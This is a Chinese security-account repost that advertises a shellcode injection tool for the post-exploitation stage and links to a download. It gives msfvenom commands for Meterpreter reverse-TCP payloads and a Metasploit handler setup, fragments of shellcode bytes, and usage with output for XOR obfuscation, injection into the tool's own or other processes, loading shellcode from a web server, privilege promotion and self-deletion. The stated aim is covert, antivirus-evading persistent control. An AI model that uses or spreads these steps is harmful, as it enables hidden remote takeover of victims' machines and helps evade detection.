服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

Q!MSF本地ShellCode注入工具

日期: 来源:Hack分享吧收集编辑:点击关注 

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


工具简介

一款本地ShellCode后门注入工具,工具主要用于在后渗透阶段使用,可将后门直接注入到特定进程内存中而不会在磁盘中留下任何痕迹,注入成功后Metasploit即可获取控制权,只要对端不关机则权限会一直维持,由于内存注入无对应磁盘文件,所以也不会触发杀软报毒。


工具使用

首先需要通过Metasploit工具生成一个有效载荷,如下是32位与64位载荷生成命令。‍

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f c

后台监听器的配置也分为32位与64位,使用工具时需要与负载的位数对应。‍
msf5 > use exploit/multi/handlermsf5 > set payload windows/x64/meterpreter/reverse_tcpmsf5 > set lhost 192.168.1.120msf5 > set lport 443msf5 exploit(multi/handler) > exploit

工具参数列表预览
Shell> InjectShellCode32.exe  ____  _          _ _   ___        _           _/ ___|| |__   ___| | | |_ _|_ __  (_) ___  ___| |_\___ \| '_ \ / _ \ | |  | || '_ \ | |/ _ \/ __| __| ___) | | | |  __/ | |  | || | | || |  __/ (__| |_|____/|_| |_|\___|_|_| |___|_| |_|/ |\___|\___|\__|                                |__/
Usage: ShellCode 远程线程注入器E-mail: me@lyshark.com
Options: --show 显示当前所有可注入进程 --promote 尝试提升自身进程权限 --delself 从系统中删除自身痕迹
Format: --Format 将字节数组格式化为一行并打印 --FormatFile 将字节数组格式化并写出到文件 --Xor 将文本中压缩后的字节数组进行异或并输出 --Xchg 将压缩后的字符串转为字节数组格式 --XorArray 将字节数组加密/解密为字节数组格式
Inject: --InjectSelfShell 注入字符串到自身进程并运行 --InjectArrayByte 注入字节数组到自身进程并运行 --FileInjectShell 从文件中读入字符串并注入运行 --InjectProcShell 注入字符串到远程进程并运行 --InjectWebShell 从远程加载字符串并注入自身进程
Encode: --EncodeInFile 从文件读入加密字符串并执行反弹 --EncodePidInFile 注入加密后的字符串到远程进程中

列出项目前系统中支持注册的进程

InjectShellCode32.exe --show
[*] x32 进程PID => 4 进程名 => System[*] x32 进程PID => 124 进程名 => Registry[*] x32 进程PID => 588 进程名 => smss.exe[*] x32 进程PID => 836 进程名 => csrss.exe[*] x32 进程PID => 940 进程名 => wininit.exe[*] x32 进程PID => 948 进程名 => csrss.exe[*] x32 进程PID => 1012 进程名 => services.exe

尝试使用命令牌授权

InjectShellCode32.exe --promote
[+] 获取自身Token[+] 查询进程特权[*] 已提升为管理员

删除自身程序

InjectShellCode32.exe --delself
[*] 自身已清除

将攻击载入荷格式化为一行纯字串
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x8b\x72\x28\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49""\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78""\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
InjectShellCode32.exe Format --path d://shellcode.txt
fce88f0000006031d289e5648b52308b520c8b52140fb74a268b722831ff31c0ac3c617c022c20c1cf0d01...


将攻击加载荷格式化为一步并写出到文档

"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x8b\x72\x28\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49""\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78""\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
InjectShellCode32.exe FormatFile --path d://shellcode.txt --output d://output_shellcode.txt[+] 已储存 => d://output_shellcode.txt


将一步攻击载入异常或处理

InjectShellCode32.exe Xor --path d://output_shellcode.txt --passwd lyshark
% &{{%ssssssuspr'q{z&vuw{!vqps{!vqs {!vqrws%!tw"qu{!tqq{pr%%pr s" p urtwst{%s!v"qvuu"ssvp%%'v


将一段压缩负载转换成字节数组

InjectShellCode32.exe Xchg --input d://output_shellcode.txt --output d://array.txt[+] 字节已转为双字节[*] 已写出ShellCode列表 => d://array.txt
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x8b\x72\x28\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49""\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78""\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";


对字母节分组进行异常或处理

"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x8b\x72\x28\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49""\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78""\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
InjectShellCode32.exe XorArray --path d://array.txt --passwd lyshark
"\xbf\xab\xcc\x43\x43\x43\x23\x72\x91\xca\xa6\x27\xc8\x11\x73\xc8""\x11\x4f\xc8\x11\x57\x4c\xf4\x9\x65\xc8\x31\x6b\x72\xbc\x72""\x83\xef\x7f\x22\x3f\x41\x6f\x63\x82\x8c\x4e\x42\x84\xa\x36""\xac\x11\x14\xc8\x11\x53\xc8\x1\x7f\x42\x93\xc8\x3\x3b\xb3""\xf6\xe1\x15\x29\x43\x10\xbc\x96";


将攻击载入登录到自身进入程序内

InjectShellCode32.exe InjectSelfShell --shellcode fce88f00002c201...[+] 解码地址: 19db64


将字母节数字组注册到自我进入程序内

"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x8b\x72\x28\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49""\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78""\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
InjectShellCode32.exe InjectArrayByte --path d://shellcode.txt[+] 解码地址: 19df20


将一行字串注入到自我进入程序内

fce88f0000006031d289e5648b52308b520c8b52140fb74a268b722831ff31c0ac3c617c022c20c1cf0d01...
InjectShellCode32.exe FileInjectShell --path d://output_shellcode.txt[+] 解码地址: 19df20


从远程Web服务器添加字符串并注册到自身进程内

192.168.1.100:80/shellcode.rawfce88f0000006031d289e5648b52308b520c8b52140fb74a268b722831ff31c0ac3c617c022c20c1cf0d01...
InjectWebShell --address 192.168.1.100 --payload shellcode.raw


直接注册加入密后的攻击加载到自身进程内

InjectShellCode32.exe Xor --path d://output_shellcode.txt --passwd lyshark% &{{%ssssssuspr'quw{!vqps{z&v{!vqs {!vqrw{!tqq{pr%%s%!tw"qupr s" p urt sqq qs r %s'sr 
InjectShellCode32.exe EncodeInFile --path d://xor_shellcode.txt --passwd lyshark[+] 解码ShellCode字节 => 708 bytes[+] 格式化ShellCode字节地址 => 19df00[*] 激活当前反弹线程 => 2a60000


注册攻击加载到远程进程

InjectShellCode32.exe InjectProcShell --pid 13372 --shellcode fce88f0000006031d2648b523089e...[*] 开始注入进程PID => 13372[+] 打开进程: 360[+] 已设置权限: 3866624[*] 创建线程ID => 352


输入加密后的攻击载入

% &{{%ssssssuspr'quw{!vqps{z&v{!vqs {!vqrw{!tqq{pr%%s%!tw"qupr s" p urt sqq qs r %s'sr 
InjectShellCode32.exe EncodePidInFile --pid 8384 --path d://xor_shellcode.txt --passwd lyshark[+] 解码ShellCode字节 => 708 bytes[+] 读入ShellCode长度 => 1687292[*] 开始注入进程PID => 8384 长度 => 354[+] 打开进程: 340[+] 已设置权限: 12451840[*] 创建线程ID => 356


下载地址

点击下方名片进入公众号

回复关键字【230310】获取下载链接



关注公众号回复“1208”可以领取个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。


往期推荐工具

渗透测试常用的数据库综合利用工具

RequestTemplate红队内网渗透工具

Railgun - 一款GUI界面的渗透工具

GoBypass - Golang免杀生成工具

ByPassBehinder冰蝎WebShell免杀工具

SweetBabyScan内网资产探测漏扫工具

掩日 - 适用于红队的综合免杀工具

AuxTools浮鱼渗透辅助工具箱V1.0

POCbomber红队快速打点漏洞检测工具

相关阅读

  • Github渗透测试工具库

  • 目录前言漏洞练习平台花式扫描器信息搜索工具WEBwindows域渗透工具FUZZ漏洞利用及攻击框架中间人攻击及钓鱼密码破解二进制及代码分析工具EXP编写框架及工具隐写各类安全资
  • X!BurpSuite验证码识别插件配置

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。插件介绍captcha-killer的
  • 一款综合性的信息收集工具-Dmitry

  • dmitry是一款在web渗透测试中常用的信息收集工具。主要功能包括端口扫描、host查询、子域名查询等常规信息。本文让我们一起来学习吧!安装在最新版kali中dmitry已经默认安装
  • 动动嘴就能使唤Excel?我的童年梦想实现了!

  • Excel 一直都是很多差友们工作、学习时候的噩梦,世超清晰地记得那年被各种函数、图标应用、表格工具,折磨的痛不欲生的经历。那时候世超就觉得 Excel 是最反人类的办公软件,它
  • 字节跳动openday,等你来!

  • 编者按为增加就业机会,增强就业竞争力,校团委与学生处/就业指导中心联合推出面向全校毕业生的就业见习项目—果壳直通车。该项目通过准确把握见习政策,强化开发见习岗位,为我校
  • 生成式AI时尚:我们每个人都是时装设计师

  • 编者按:AI 不仅能作图,还能设计衣服。目前,DALL-E 2 和 Stable Diffusion 等 AI 作图工具大火,时尚界也紧跟技术步伐,出了能自动生成时装设计的工具。CALA 平台利用 OpenAI 的 DA

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • Github渗透测试工具库

  • 目录前言漏洞练习平台花式扫描器信息搜索工具WEBwindows域渗透工具FUZZ漏洞利用及攻击框架中间人攻击及钓鱼密码破解二进制及代码分析工具EXP编写框架及工具隐写各类安全资
  • Q!MSF本地ShellCode注入工具

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。工具简介一款本地ShellCod
  • X!BurpSuite验证码识别插件配置

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。插件介绍captcha-killer的
  • Alist在手,全盘我有!

  • alist可以说是把网盘玩透彻了。他自身不提供用户存储,而是为用户提供各网盘的接口为一体。做到了alist在手,全盘我有!本文让我们一起来看看吧!安装alist的安装很简单。官方提供
  • 实战撸进内网服务器 (Bypass)

  • 文章来源:先知社区(我想学安全)原文地址:https://xz.aliyun.com/t/8083如有侵权,请联系删除0x01 前言本次教程较为基础,打码比较严重,有很多不足的地方,希望各位大佬能够指正。目标
  • 一款综合性的信息收集工具-Dmitry

  • dmitry是一款在web渗透测试中常用的信息收集工具。主要功能包括端口扫描、host查询、子域名查询等常规信息。本文让我们一起来学习吧!安装在最新版kali中dmitry已经默认安装